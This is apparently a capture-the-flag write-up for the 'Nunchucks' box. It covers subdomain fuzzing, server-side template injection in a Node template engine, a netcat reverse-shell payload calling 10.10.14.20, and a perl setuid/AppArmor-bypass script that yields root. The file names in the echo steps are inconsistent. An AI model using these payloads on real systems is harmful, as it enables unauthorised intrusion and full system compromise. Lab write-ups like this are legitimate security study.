Engagement flow
Summary
This was a box designed for the UHC security qualifiers. The first challenge is working with template injection and expanding into a shell. From here we use linpeas and enumerate the box to learn about a "setuid cap" permission which matches up with a known GTFObin to help us escape the binary and abuse those setuid privileges passed by root. We have to bypass the "app armor" security holding us back. So we actually passed the GTFObin commands to a perl script, writing to host where we could then execute to abuse the setuid binary for root.
Tools used
burpsuite
ffuf
dirbuster
TPL map
GTFObins
Processes / techniques
Request proxying
Sub domain enumeration
SSTI enumeration
Template injection
App armour bypass
Reference
Phase -1 Enumeration
With only SSH and http ports our attack surface will be quite narrow.
Starting off with a basic nmap scan shows us only three ports. Port 22 will likely be used to connect into the machine. Port 80 and 443 provide our attack surface which is fairly straight forward suggesting we have to focus on the website service.
From here we dive a little deeper and run a second scan with the nmap default scripting engine and service version scripts. This allows us to gather more information to really help us ascertain our attack surface.
We noticed here that a domain was leaked in the redirect error. We can really leverage this by adding it to our /etc/hosts file to bypass the standard dns lookup and potentially reveal further information.
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
Phase 1 - Enumeration - Web & Domain
From here we start several tasks that run in the background in order to help maximize our time and efforts. We will utilize AutoRecon for in-depth enumeration of our target, ffuf for subdomain enumeration, and dirbuster for hidden directories.
ffuf
If a subdomain is forgotten about, it can be the achilleas heel. Often the case in bug bounties.
With ffuf our goal is to enumerate sub domains. We can do this with the following commands below which call the sec DNS enum list and targets our web url and host file. In this case we do have a successful hit and we find the store.nunchucks.htb webpage which widens our attack surface. The directory checks on store.nunchucks.htb reveal nothing so from here we really focus our efforts and enumerate deep into the webpage.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://nunchucks.htb -H "HOST: FUZZ.nunchucks.htb" -fs 30589
-w = wordlist
-u = url
-H = Hosts file
-fs = Remove response code from results
AutoRecon
As always I start autorecon and have it running in the background to do things like check all ports up to 65535, scan UDP, stealth scans, and so on and so forth. This helps me with finding anything I could not initially pickup while I spend my effort elsewhere.
dirbuster
We start looking for subdirectories on the side.
Website
Here we have a quick look at our website and there is nothing interactive.
Website - store.nunchucks.htb
Here we view the alternative domain
Dirbuster - store.nunchucks.htb
Running a directory check revealed nothing.
Phase 2 - Initial foothold - SSTI
The primary attack surface I see on this website is the "Your email here" box. So we try some error based injection and XSS payloads while of course reviewing the page source. None of our initial enumeration proves fruitful so we move to a deeper enumeration of our target website and utilize burpsuite.
Looking at the request we see the email field down below. We know it is not using XML so the next likely option is a template engine related to a javascript. We know javascript is being used based on the content-type:application/json.
Alright so sending our request and reviewing the response just shows we are to expect an update at the provided email address, nothing special.
When looking for server side template injection there is quite a slick flow we can follow to test the application for bad input sanitization.
If we enumerate are target form with the suggested syntax, a math equation. We can see it returns true suggesting we have successful server side template injection. Now we have to figure out how to tailor this for our chosen application.
Researching eventually brought me here where it was made quite clear what breakout syntax we had to use based on the fact we were using the nunchucks template engine. I did struggle initially and eventually learned that I had to breakout of the escape by adding backslashes to escape the double quotes.
{
"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}"
}From here we attempt to echo our ssh-key onto the target machine.
I couldn't get this working so I passed a bash reverse shell instead and it worked!
"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 6363 >/tmp/f')\")()}}aaa@aaaa"Success!
Phase 3 - Privilege's escalation
We start off as always with a file transfer using wget in order to get the linpeas enumeration script. We find a setuid capability for the perl binary. We look this up on GTFO bin and from here we pass the command in a one line argument.
perl -e'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
However despite running the command to escape and provide us root privilege's something is not working. we are currently blocked by some type of security layer, likely an AV flagging the exe "/bin/bash" string in memory. However we are indeed root but we cannot use the shell as root.
perl -e'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
Kali: rootPhase 3B - App armor security control bypass to root
One way to restrict and protect binaries in Linux is to utilize app armour which allows security restriction on individual binaries. We can actually check which binaries have restrictions in place.
/etc/apparmor.d$ls
abstractions disable force-complain local lsb_release nvidia_modprobe sbin.dhclient tunables usr.bin.man usr.bin.perl usr.sbin.ippusbxd usr.sbin.mysqld usr.sbin.rsyslogd usr.sbin.tcpdumpOne known way to bypass app armor when it restricts the use of a binary from the command line is to write a script calling perl as the Shebang. This is exclusive to the app armor restrictions on perl.
So we simply try and create a script with nano and vim, this does not work. So we instead echo the contents into a file line by line.
echo "#!/usr/bin/perl" > pwned.pl
echo "use POSIX qw(setuid);" >> pwnedl.pl
echo "POSIX::setuid(0);" >> pwnedl.pl
echo exec "/bin/bash"; >> pwnedl.plThis provides us with our file that we can run as ./pwned.pl for a bash shell as root.
david@nunchucks:/tmp$ cat pwned.pl
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";